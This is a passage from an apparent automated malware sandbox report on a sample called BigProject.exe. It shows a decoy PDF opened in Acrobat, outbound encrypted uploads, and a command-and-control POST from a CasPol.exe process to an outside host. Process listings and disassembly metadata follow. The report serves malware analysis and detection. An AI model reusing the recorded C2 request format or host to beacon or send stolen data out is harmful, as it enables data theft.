2a e3 49 9a 7a fe 2f da e4 f2 97 f5 1a 3e 4f 2b d5 cb a8 22 dc 8a fb 65 10 a5 29 ce 77 45 61 0b a7 b3 cd 5e ea ff f7 6f fa de Data Ascii: &T`^)&qd%yL:zgIzRm`}Xfy Ui\=#$5HM\|6\|lA;&.D!A9]V78HSYh"cm7j\;xU-[<RlM'A]Na=}yi/ZpC}6IE0[Iz/>O+"e)wEa^o
2024-12-21 12:17:36 UTC	15331	OUT	Data Raw: 29 ce 77 65 dc 8e 03 77 d5 8d fd fa c5 5b 78 d4 d1 9f e9 5f ab 37 ea cf 51 04 76 2b f7 0b f0 b5 79 60 20 99 21 64 23 ee 90 b6 3f d4 af 4a 91 e8 da 2d d9 7c 96 5f 04 32 dd 95 31 07 12 d0 37 79 3e d5 9a ea 0f e0 af 1d db 84 a4 54 72 32 b4 53 83 42 ba 3e 3e 06 a6 15 75 ec 40 d0 95 f6 e2 c7 3d 06 ef 90 26 0e e3 37 a9 6c 93 12 ea 61 c9 cd 70 12 53 4e 91 32 20 c9 40 75 f8 b6 d8 2f e7 8e 30 fe 37 dd b1 38 1b 8a db 1c db 0e 8d 47 08 2c 9b a6 62 aa a5 3d 99 fa b3 c8 5b e9 4a 53 9a 1f 69 d9 70 58 9c b3 4c 39 dc cf 0b fe eb bb b1 20 f3 64 2b f9 09 bf 7e d5 c3 9c c7 23 77 15 f5 88 7a ad e1 71 d4 96 c6 8c de 04 4b 9d 30 81 98 ad 36 e8 41 2f e8 d4 35 be ee bb df fe 98 ed 96 fd cd 76 d8 ed fb d4 95 be 59 26 b1 5d 51 8f 47 d9 a7 be f5 f8 8c 0a f6 1e 67 fb a1 6e 0c e8 c1 Data Ascii: )wew[x_7Qv+y` !d#?J-\|_217y>Tr2SB>>u@=&7lapSN2 @u/078G,b=[JSipXL9 d+~#wzqK06A/5vY&]QGgn
2024-12-21 12:17:36 UTC	15331	OUT	Data Raw: fb 79 3b 3d 36 49 07 29 3d ce 73 a5 6e cd 8d 16 44 18 e5 26 c1 4e f4 46 77 83 b7 f1 b1 e9 98 03 ba d9 d1 e5 75 f7 6a 9f ab 54 65 53 03 66 b1 01 84 eb 61 25 eb da 6c 75 c5 54 10 b2 78 60 ac 4c 2a 29 45 8c 79 7b e3 bd 82 d6 83 5b 90 de ab de c4 d7 c1 7f bd 73 78 2f f5 77 75 c9 b0 26 28 0b 40 33 55 7a a6 75 77 ec c1 03 05 fd 6f 2a a3 3d 93 0b 87 41 db 6a 55 98 d4 ad 34 6f fa e7 cd 96 e7 88 3e fd dd 4a 38 7a ab 95 70 71 e9 5f e8 84 91 75 71 35 cf 9f a8 3d d5 6f ff 9b 78 fa 38 08 fc 91 3c 5d dc 79 49 e7 ce d2 25 e7 6d f1 c6 85 3f 15 fa 88 77 6f 78 5d 19 22 de 39 21 b9 d8 5a de 36 fa 9a de 1a 5d 11 53 68 7e e9 87 d4 72 1f 53 dc 35 79 7a d5 f9 a6 e9 09 e6 d3 80 5b 05 49 85 4a 2c 5d 49 e2 94 ee d0 0c b8 40 3c e2 44 0e fa 69 f9 d0 47 a7 0a 31 bc fc 54 37 67 f4 69 Data Ascii: y;=6I)=snD&NFwujTeSfa%luTx`L)Ey{[sx/wu&(@3Uzuwo=AjU4o>J8zpq_uq5=ox8<]yI%m?wox]"9!Z6]Sh~rS5yz[IJ,]I@<DiG1T7gi
2024-12-21 12:17:36 UTC	15331	OUT	Data Raw: ac 2f 5b 2e ea d7 a3 f5 f1 3e 2d 58 45 28 6e 84 33 71 bc c2 23 47 e6 eb 1b 72 0f e7 e8 c1 d3 3a 59 fb a1 77 3b 94 6c 09 89 b0 48 4f 0d 69 2d 17 f7 fe 88 fd 39 0f bf fd 82 32 67 e6 b1 d2 b2 53 19 6b 90 8d 4a 28 ff 14 e6 52 b0 14 44 2a 89 c0 bd 33 bd 6e 1e c7 96 dc c9 d7 48 d3 52 a4 1b 07 df aa 02 71 da d9 03 ca 07 82 21 20 62 62 eb da a8 54 b0 a4 6c b5 db 56 d7 4d 81 1a 3d f7 dd 2e 5a 60 42 f6 88 92 27 db aa 99 3b 41 86 f4 76 fc 12 27 1d 55 32 39 8b 71 49 7a d5 be b1 a4 63 35 90 ec 51 70 4d 8f 11 ca cb 49 68 3c 61 ec 3c 67 3e d2 38 6a 5f a8 e7 13 7e 4d 4f 7b e0 44 3d 33 ee 5a 34 bd f4 1a 96 10 7d 8d 35 79 30 83 b0 0b cd 20 cc 06 b2 25 c9 ab 07 4e ae 8d 70 0e a2 b6 54 80 49 c3 96 25 95 a0 a4 40 62 e3 84 1e 2c f3 1b ff 23 a0 78 8e 94 55 47 17 4a 1f d3 a9 7e Data Ascii: /[.>-XE(n3q#Gr:Yw;lHOi-92gSkJ(RD*3nHRq! bbTlVM=.Z`B';Av'U29qIzc5QpMIh<a<g>8j_~MO{D=3Z4}5y0 %NpTI%@b,#xUGJ~
2024-12-21 12:17:36 UTC	15331	OUT	Data Raw: db fb 97 b3 09 09 c1 60 49 90 65 37 68 75 a3 e5 c5 0a ff d5 aa fe 8d 71 7b a6 1f 7e a2 9e 30 b1 be 4c 8d c3 c5 e3 e2 6a 35 44 5d 2d b9 45 37 24 6f 22 de f1 61 63 29 73 49 77 cb e2 e6 74 1e 8c f9 a3 8c e2 b3 b8 64 ca f2 1a 46 6b c7 55 a6 de 2b 73 6d 17 81 8d 40 73 10 b8 3a 2d 41 0a 5a 56 92 95 95 ab 26 7b 56 2f 1d b4 93 0a 21 de 68 6b a9 fa 9d 35 a7 ab af 33 23 84 5e 4a 72 e1 56 8c b5 f6 ec 14 0d be f5 3b f2 28 3c a0 36 2d 32 9c 77 05 05 53 81 c5 bc 51 66 4f b0 a6 11 e4 2b 12 5b bf ae 84 62 34 7c 1e fc f9 46 7f 71 e6 17 8e d6 e0 d3 61 40 1d 56 46 f9 3a 70 d2 b1 a2 df a6 7c ac e9 76 fd aa cb 67 0b 67 ff 82 3b 8d 38 5a fd d7 2d 99 00 b7 ca e0 b5 40 6e 28 f5 0a d3 3b c0 7b 12 5a 5b f9 e4 d3 6d 5e cf ae 19 4b dd bc c3 d8 9c 78 b0 c6 de 6d ab 9e 4d c2 ae 3d 28 Data Ascii: `Ie7huq{~0Lj5D]-E7$o"ac)sIwtdFkU+sm@s:-AZV&{V/!hk53#^JrV;(<6-2wSQfO+[b4\|Fqa@VF:p\|vgg;8Z-@n(;{Z[m^KxmM=(
2024-12-21 12:17:36 UTC	15331	OUT	Data Raw: 50 41 79 74 f9 1a 06 dc f6 25 a1 96 5f 3f a8 49 b5 55 dd d4 53 68 84 05 32 36 35 2f 5b 1e 09 ff 3f c4 4e 05 da 48 96 d7 7c c5 4d db ff 48 21 e8 ca 92 3f 69 02 97 10 b6 fd 82 d0 ae 0b 2a 27 1f 3d 45 cf b5 a5 b1 06 f8 4f ae b9 11 b3 6b 20 65 24 64 1e 74 f3 c4 4e 7e 04 33 6c 5b f9 ee 00 94 d8 ec dd 46 6d a0 35 cb 7d 7b 9f 80 a5 81 5e 79 9c fd a2 b3 06 03 d7 50 dc 41 c4 8b 4a 8e 48 db d9 06 b7 f7 d6 f1 4c bc 0c 55 43 25 b4 cf c8 71 1a 43 80 98 57 49 9e c9 ec 2e d0 36 5d d4 45 0d 6f d4 85 51 ac 08 66 06 65 b7 09 91 e5 3b 82 8d e9 a8 8e 8d f2 9b 9b da 39 af ce d3 df da a8 85 e1 4d 61 39 5e a9 e2 da 61 0c 6c ca 9b a2 5a 9f 65 c5 81 87 20 67 5a e7 cc 52 80 31 5d 8e 98 36 c7 cd 91 4b e1 4b 95 93 91 11 32 73 fc bf 08 00 fa 23 26 8f 66 7e 86 63 3d 80 6e 55 45 f6 72 Data Ascii: PAyt%_?IUSh265/[?NH\|MH!?i*'=EOk e$dtN~3l[Fm5}{^yPAJHLUC%qCWI.6]EoQfe;9Ma9^alZe gZR1]6KK2s#&f~c=nUEr
2024-12-21 12:17:36 UTC	15331	OUT	Data Raw: 2a 5c 76 af bc a4 71 24 99 23 84 7d 12 8c ca e5 ab 53 ee 40 b5 f9 60 de 09 d3 c2 04 01 8c 06 ad 7f b8 42 2f ec 7c 9f e7 1c 7f a3 fe cb e6 86 0b a9 74 77 68 60 cc 73 65 ca ca b4 ee 96 43 39 92 e4 09 fb 3b 29 5a dc ee bf 5b 55 af 03 d7 f1 41 88 18 f7 fb d1 81 20 db 6d e5 b5 a7 3f 39 be 0b b3 f7 90 cf a3 c0 35 e7 d8 70 7b 1a d3 a0 20 ae 12 ed 29 60 bd 8b cb 22 e7 61 d5 2b 27 c9 f5 2b 83 d4 54 78 60 d8 45 3f bb d8 72 66 e5 fb 3e e5 fd 5b 36 2c 82 cf 51 e2 9b eb 9b 9a 7b bb 9a 42 3e 56 d4 97 71 f0 a2 62 b2 46 43 b1 89 42 e3 7c 4f 5a d9 65 e4 2f c7 5e 8f f6 e8 ad 3a f5 bb 2a 73 66 2c f4 14 53 f6 ae a8 35 a9 8f ae e0 3e 20 80 c3 ce 55 5c ff fe 1a b5 6e 87 e0 cf 60 c4 11 b0 55 da 39 6e 11 e3 38 0d 04 0f 5f 71 de 68 ea 5b ab a1 a7 6f 5d 7d fc e1 6b 07 d7 3c 66 dc Data Ascii: \vq$#}S@`B/\|twh`seC9;)Z[UA m?95p{ )`"a+'+Tx`E?rf>[6,Q{B>VqbFCB\|OZe/^:sf,S5> U\n`U9n8_qh[o]}k<f
2024-12-21 12:17:36 UTC	15331	OUT	Data Raw: be 8a 4f 55 0c 8f 25 27 d5 92 02 ce 78 fe 8c 65 05 bd ec 9b 28 fb 3d 4f fd 77 66 62 a3 da 0c 44 23 8f 4b 1a 89 cb 00 2a 84 7e c2 7f 69 88 d6 23 7e d2 76 f9 79 98 2f 5a 4d 1d 24 4a af 3d 95 cf 1b 18 82 88 8e 5d 47 91 88 af 48 34 21 ab ec e5 97 00 37 6b d7 68 23 d6 83 1e 39 07 43 9c f9 dd f4 31 59 3b 39 41 40 f0 c4 70 63 bf 65 4b 84 e3 b4 8b 26 34 16 01 16 df dc c9 5d f6 b3 b2 76 ff 6f 6d df 97 16 8e d9 f0 7b e8 95 5d c8 60 85 b7 7a 73 0c 58 8a 80 1b f8 ad 30 ba f6 08 2e e9 29 81 c0 af 3f 8d 0c 9b d4 d3 eb 23 d8 1a 34 2b 64 4b 15 fd a9 d6 a3 ea ef 15 b0 ef 67 d7 f6 3f 27 5b 5c 4a 99 64 1f f8 a1 ce 63 92 35 db ec 70 33 63 1f 96 20 f8 a1 95 94 35 dc 7c f1 8e d3 f3 8e 8b 67 09 d0 1f 1f 84 e8 f5 81 eb 17 f4 b8 10 6e 06 77 3e 1e 7c 1d 2a be 3d 3d 54 a4 fb d4 95 Data Ascii: OU%'xe(=OwfbD#K~i#~vy/ZM$J=]GH4!7kh#9C1Y;9A@pceK&4]vom{]`zsX0.)?#4+dKg?'[\Jdc5p3c 5\|gnw>\|==T
2024-12-21 12:17:39 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:17:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lo71880fa5qlq6imauc6n74gdo; expires=Wed, 16 Apr 2025 06:04:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W0ch99y5bdChR22w6bqfjZhYQRjL8w5T8cVe7w50Fp4OcXpaWXKKoe1Jd1NTMmRxQY6hzMp9kSCpD%2BgJAGzr29BBROP9Yew9szkYnyHt8XGl28FzwF5AAGEKJsA7k42PbQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57cf5d8ce2efa9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1871&min_rtt=1864&rtt_var=713&sent=266&recv=438&lost=0&retrans=0&sent_bytes=2831&recv_bytes=424958&delivery_rate=1520041&cwnd=140&unsent_bytes=0&cid=b0e72597b8d9c475&ts=2512&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49773	172.67.197.170	443	7404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:17:40 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 83 Host: discokeyus.lat
2024-12-21 12:17:40 UTC	83	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4f 50 43 4e 32 4d 2d 2d 53 65 72 67 65 69 26 6a 3d 26 68 77 69 64 3d 41 34 30 41 30 41 31 34 38 30 37 32 33 41 35 45 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=OPCN2M--Sergei&j=&hwid=A40A0A1480723A5EAC8923850305D13E
2024-12-21 12:17:41 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:17:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uqdb1qg8ri861okv6kih0mbv83; expires=Wed, 16 Apr 2025 06:04:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdYQZ7w%2BUAHYARDiLv5pThrvpG8PNbqRMRCPIpVZGr%2BDJ%2BSDbwQmlrPO1ACMIpfoY1Bffoe6taNkx6wyQ8x982i9cZRV7d3ER%2BohB5efiS7XVccJ%2BUp4d7Dosdm86XOjLg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57cf76af75423f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2216&min_rtt=2192&rtt_var=839&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=981&delivery_rate=1332116&cwnd=237&unsent_bytes=0&cid=e0795c6a5fa356d3&ts=758&x=0"
2024-12-21 12:17:41 UTC	54	IN	Data Raw: 33 30 0d 0a 77 53 56 4b 65 31 6d 78 59 58 73 44 76 69 67 49 42 68 52 2f 73 5a 64 47 54 6c 68 52 5a 74 77 65 49 36 47 5a 6e 50 66 77 6d 78 4f 61 65 41 3d 3d 0d 0a Data Ascii: 30wSVKe1mxYXsDvigIBhR/sZdGTlhRZtweI6GZnPfwmxOaeA==
2024-12-21 12:17:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:17:01
Start date:	21/12/2024
Path:	C:\Users\user\Desktop\BigProject.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BigProject.exe"
Imagebase:	0xb40000
File size:	1'600'512 bytes
MD5 hash:	98ACEFB3B4D697642895F954C5256A49
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:17:14
Start date:	21/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf"
Imagebase:	0x7ff686a00000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	07:17:15
Start date:	21/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:17:16
Start date:	21/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1508,i,10346652073434978683,7564369482762319465,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:17:17
Start date:	21/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase:	0x7c0000
File size:	108'664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.8%
Total number of Nodes:	71
Total number of Limit Nodes:	6

Executed Functions

Function 00C17458 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 00C17462

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 0fc007bc1f2ccb52cf6ff69c118ec0a4d2fb3aea32e44e5e8e2a10dc5e6129b8
Instruction ID: dc68879d452810952f33bef83c119471d2df9bb279946a69e84c091dbd0e3acc
Opcode Fuzzy Hash: 0fc007bc1f2ccb52cf6ff69c118ec0a4d2fb3aea32e44e5e8e2a10dc5e6129b8
Instruction Fuzzy Hash: 38D0C935914208DACF04EBE494496CEBBF8AB04289F500665D051A214493B5E7C9DEA1

Function 00CA488D Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_CxxThrowException.VCRUNTIME140(?,00CB21B0), ref: 00B410E9
_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00CA3DC3,00000024,00CA2449,7FFFFFFF,?,?,?,?,?,?,00BFB5F0,?), ref: 00CA4895
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00CA3DC3,00000024,00CA2449,7FFFFFFF,?,?,?,?,?,?,00BFB5F0,?), ref: 00CA48A2
_CxxThrowException.VCRUNTIME140(?,00CB214C), ref: 00CA520D

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: ExceptionThrow$_callnewhmalloc
String ID:
API String ID: 4113974480-0
Opcode ID: 75c4ed42474bcdab91d7aaa29068a636146049a58cc77c7fcd4d8dc5022910f9
Instruction ID: 9123dd1cf19703111cd216a8e339a4eaebc4a87caa95a4521e0f0316c3283d52
Opcode Fuzzy Hash: 75c4ed42474bcdab91d7aaa29068a636146049a58cc77c7fcd4d8dc5022910f9
Instruction Fuzzy Hash: A3F0A93180074FB68F14BAB9EC4589E776C9E02364B10C575FA28E25D1EFB4DA94D6D0

Function 00CA31B6 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00CA2375,?,00C17369), ref: 00CA31DC

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 01e0b183677cea484a5d829b3861f43c12165f5c0590426df1f3d324935bf815
Instruction ID: 6fcc045abfef5a589b2809f110d7e205ff340a3b4b18ad2e4a279976ec4914a8
Opcode Fuzzy Hash: 01e0b183677cea484a5d829b3861f43c12165f5c0590426df1f3d324935bf815
Instruction Fuzzy Hash: A2D097322080D42EEC0D2324BC4C26EBF1EDBC33A9320448DF5004A408CA226FC14288

Function 00CA3250 Relevance: 1.3, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4374e2b4eb72b19ac19665c03842f50a4a9198c02bdb3342000813fdc2e8a64
Instruction ID: f62865c5d1fc93115c77409fe132db150e210c5fcc44ec4cb1859a59590aa7df
Opcode Fuzzy Hash: b4374e2b4eb72b19ac19665c03842f50a4a9198c02bdb3342000813fdc2e8a64
Instruction Fuzzy Hash: B9F08BB1901282A6CF1CAB78E815D8E73EC9F4035AB104ABCF412C2291DB38CFC49750

Non-executed Functions

Function 00CA53A4 Relevance: 9.1, APIs: 6, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00CA53B0
memset.VCRUNTIME140(?,00000000,00000003), ref: 00CA53D6
memset.VCRUNTIME140(?,00000000,00000050), ref: 00CA5460
IsDebuggerPresent.KERNEL32 ref: 00CA547C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CA5495
UnhandledExceptionFilter.KERNEL32(?), ref: 00CA549F

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID:
API String ID: 1045392073-0
Opcode ID: 983bf8539f0ab7f7d7a629d479b198974e69a1faef4cb9c0635dcb59b7c00d09
Instruction ID: e12cbd4ff9508ffa11278a51bc5527e31a98210e2ffcfb763cd92c58bae055c4
Opcode Fuzzy Hash: 983bf8539f0ab7f7d7a629d479b198974e69a1faef4cb9c0635dcb59b7c00d09
Instruction Fuzzy Hash: 1D31F975D01619DBDF21EFA4D949BCDBBB8AF08304F1081AAE40DAB250E7759B848F45

Function 00CA5294 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CA52A6
GetCurrentThreadId.KERNEL32 ref: 00CA52B5
GetCurrentProcessId.KERNEL32 ref: 00CA52BE
QueryPerformanceCounter.KERNEL32(?), ref: 00CA52CB

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 786cd2fa860328c5c703bd863798fab1bf72eaf38163cd96257f33417059aa3e
Instruction ID: c474044fa6cd841ab9960e5c2f17994e3d36711374be26938d1878ce921328aa
Opcode Fuzzy Hash: 786cd2fa860328c5c703bd863798fab1bf72eaf38163cd96257f33417059aa3e
Instruction Fuzzy Hash: C6F06274D1124DEBCB00EBB4DA89A9EBBF4FF1C204F914695A412EB110E730AB449B50

Function 00CA4EB1 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CA4EC7

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
